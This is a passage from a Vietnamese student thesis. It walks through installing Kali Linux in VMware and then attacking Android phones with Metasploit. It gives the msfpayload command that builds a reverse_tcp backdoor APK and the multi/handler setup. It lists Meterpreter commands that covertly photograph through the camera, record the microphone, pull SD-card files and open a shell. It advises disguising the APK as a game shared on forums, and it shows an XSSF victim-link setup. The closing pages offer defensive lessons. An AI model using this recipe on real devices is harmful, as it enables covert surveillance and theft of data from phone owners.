4.3.2. Cài đặt.
Trước tiên cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài này ta sẽ tiến
hành cài phiên bản Kali Linux 64 bit. http://www.kali.org/downloads/
Hình 38. Nhấp vào link để down file iso của Kali
Tất nhiên ta cần phải có Vmware, việc tải và cài đặt Vmware rất dễ dàng, ta có thể tìm trên mạng.
Sau khi có file ISO ta bắt đầu tiến hành cài đặt lên máy ảo.
50. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
50
Bắt đầu thiết lập các thông số cho wmware:
Tùy vào cấu hình máy tính các bạn có thể lựa chọn các bản Kali linux khác nhau và thiết
lập cấu hình máy ảo.
Cấu hình máy ảo tối thiểu: 8g ổ cứng và 512 Mb ram.
Một số lưu ý khi sử dụng vmware:
Lỗi chế độ card bright set auto có thể khiến máy ảo không ra được mạng.Nên thiết lập như
hình dưới.
menu->edit->vitualeditor.editor.
Hình 39. Chọn card mạng cho VMnet0
Mở VMware, chọn File ở góc phải trên màn hình, chọn New Virtual Machine... . Trên cửa sổ
mới mở, chọn custom và nhấn next
51. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
51
Hình 40. Chọn phương thức cài đặt
Tiếp tục nhấn next đến khi yêu cầu chọn file ISO thì ta chọn ISO của kali đã tải trước đó:
Hình 41. Chọn phần cứng máy ảo
52. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
52
Hình 42.Chọn cách cài hệ diều hành
Hình 43. Chọn loại Hệ điều hành sẽ cài
53. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
53
Hình 44. Chọn đường dẫn lưu máy ảo
Hình 45. Chọn số nhân sẽ sử dụng trong máy ảo
54. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
54
Hình 46. Chọn lượng ram sẽ sử dụng trong máy ảo
Hình 47. Chọn cách kết nối mạng là Bridged
55. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
55
Hình 48. Chọn loại điều khiển nhập xuất
Hình 49. Chọn loại đĩa sẽ được tạo
56. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
56
Hình 50. Chọn cách thức sử dụng đĩa
Hình 51. Chọn dung lượng tối đa của đĩa
57. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
57
Hình 52. Tìm đường dẫn đến file iso Kali Linux.
B2.Tiến hành cài đặt:
Start máy ảo:
Chọn chế độ install graphic.
58. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
58
Hình 53. Cài đặt Kali Linux
Hình 54 .Chọn Ngôn Ngữ.
59. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
59
Hình 55. Bắt đầu tiến trình cài
Hình 56.Đặt tên Hostname
60. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
60
Hình 57. Đặt tên Domain name
Hình 58. Đặt password cho user root
62. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
62
Hình 61. Phương thức cài đặt ổ đĩa.
Hình 62. Xác nhận thông số cài đặt
63. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
63
Hình 63. Xác nhận định dạng ổ đĩa.
Hình 64. Cài đặt bắt đầu.
64. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
64
Kết thúc quá trình install bạn chọn như hình dưới:
Hình 65. Tìm kiếm cập nhật qua internet.
Ở đây nếu chọn Yes tiến trình sẽ kiểm tra có hay không bản cập nhật qua mạng. Ta chọn No để
nhanh chóng cài đặt (có thể cập nhật sau khi cài đặt xong).
Hình 66. Xác nhận cài đặt GRUD.
65. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
65
Tiếp theo tiến trình sẽ hỏi có cài đặt và sử dụng GRUB để khởi động không. Ta chọn Yes
=> Continue.
Hình 67. Xác nhận cài đặt thành công.
Thông báo xác nhận Kali Linux Đã cài đặt xong. Ta chọn Continue tiến trình sẽ thực hiện xoa
một số file dư thừa sau khi cài đặt rồi khởi động lại.Sau khi hoàn tất phần cuối và khởi động lại,
đến giao diện login ta nhập user là root và password đã đặt ở phần trước.Vậy là ta đã hoàn tất
cài đặt kali linux trên Vmware
Hình 68. Giao diện Kali linux
66. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
66
4.4. Tạo mã độc trên Kali Linux để xâm nhập Android.
Trước khi tiến hành ta nên thiết lập phần Network như sau:
Vào VM => Settings... ở thanh lựa chọn của Vmware
Vào Network Adapter và chọn Bridged: connectiondirectlyto the physical network
67. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
67
Vào Edit => Virtual Network Editor...
Trên phần Bridge (connect VMs directlyto the external network) chọn adapter của máy
thật
68. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
68
4.4.1. Tạo lập Backdoor
Tiếp theo ta sẽ tiến hành xâm nhập và điều khiển Android bằng Kali Linux. Đầu tiên ta cần
tạo 1 file apk có chứa backdoor bằng cách:
Đầu tiên mở terminal và gõ dòng lệnh ifconfig để biêt thông tin ip của máy.
Sử dụng lệnh msfpayload android/meterpreter/reverse_tcplhost=192.168.220.128
lport=8080 R > /root/Desktop/App.apk để tạo backdoor. Với 192.168.220.128 là ip đã tìm
được ở trên.
Lệnh trên sẽ tạo ra 1 file app.apk trên desktop của Kali, đây chính là một Metasploit
reverse tcp backdoor.
69. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
69
Tiếp theo, gõ lệnh msfconsole
Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ
lệnh sau:
use exploit/multi/handler
set payload /meterpreter/reverse_tcp
set lhost 192.168.220.128 – nhập địa chỉ IP giống với khi tạo payload ở trên.
set port 8080 – nhập port giống với port khi tạo payload ở trên.
exploit
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
70. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
70
Đến đây, vấn đề của chúng ta là làm sao để phân tán file chứa backdoor App.apk đến các
máy Android. Ta có thể ngụy trang file App.apk thành một ứng dụng, game va tiến hành chia sẻ
trên forum. Ở đây thử với một máy Sony Xperia Z giả lập, tải về app.apk, cài đặt và mở lên được
giao diện như dưới, nhấp vào nút reverse_tcp:
71. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
71
Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:
Để xem tất cả các lệnh hỗ trợ nhập help
72. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
72
Để xem thông tin về máy, nhập lệnh SysInfo
Xem thông tin card mạng nhập lệnh ipconfig:
Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách
camera ở phần trước. Ví dụ như sau:
File hình đã chụp từ camera của máy android là RbWBRryj.jpeg được lưu ở /root của
máy
73. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
73
Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
Ta được file ghi âm
Lấy file từ sd card
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
74. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
74
Ví dụ ở đây, ta tải file App.apk trong thư mục sdcard.dùng lệnh download App.apk
Và file này sẽ được tải về thư mục root của máy Kali
Nhập lệnh shell để điều khiển máy trong chế độ shell. Tai đây ta nhập lệnh ls –l để xem
các file và quyền hạn cần để sử dụng.
75. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
75
Như các bạn cũng thấy thư muc data cần quyền hạn cao nhất để tiến hành sử dụng. Mà các dữ
liệu quan trọng như Contacts, SMS, tài khoản đồng bộ Google… đều được lưu tại đây. Vi thế ta
chỉ có thể lấy cắp các thông tin này nếu như máy Android bị xâm nhập đã được root (hack
chiếm quyền điều khiển cao nhất).
4.4.2. XSSF
Để cài đặt XSSF cho kali sử sụng 3 câu lệnh:
msfupdate
cd /opt/metasploit/apps/pro/msf3
svn export http://xssf.googlecode.com/svn/trunk ./ --force
76. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
76
Xài lệnh trên hình để vào XSSF
Tiếp tục là lệnh
Xssf_urls
77. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
77
Ta thấy XSSF LOG PAGE : http://192.168.220.128:80/xssf/gui.html?guipage=main ,mở trình
duyệt để vào địa chỉ này để vào giao diện XSSF
78. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
78
Địa chỉ gửi cho điện thoại nạn nhân là: http://192.168.220.128:80/xssf/test.html
Kết quả trên terminal khi có diện thoại Android vào link này:
Lệnh xssf_victim dùng để hiện thong tin nạn nhân
79. GVHD: VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
79
Lệnh xssf_information dùng để hiện thông tin nạn nhân chi tiết hơn
Tiếptục lệnhsearchauxiliary/xssf để để xem tất cả các lệnh được hỗ trợ
80. GVHD:VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
80
Refesh lại lại trang web sẽ thấy thông tin nạn nhân
Ví dụ: sử dụng lệnh alert để cảnh báo nạn nhân:
81. GVHD:VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
81
Gõ run để thực hiện lệnh
82. GVHD:VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH
82
Chương II: Kết luận
Như vậy, ta đã tìm hiểu về Kali Linux, các cải tiến của nó so với BackTrack. Cách sử
dụng Metasploit của Kali Linux để xâm nhập và điều khiển, truyền dữ liệu từ máy Android
về máy.
Sau khi thử nghiệm cách tấn công này, ta rút ra không nên nhấp vào link lạ hay tải về
và chạy file lạ trên máy android để bảo đảm không cài nhầm backdoor như đã thấy ở trên,
không tiến hành root may nếu không thực sự cần thiết vì chỉ cần máy bị nhiễm backdoor là ta
đã có thể xem như có toàn quyền kiểm soát máy Android đó.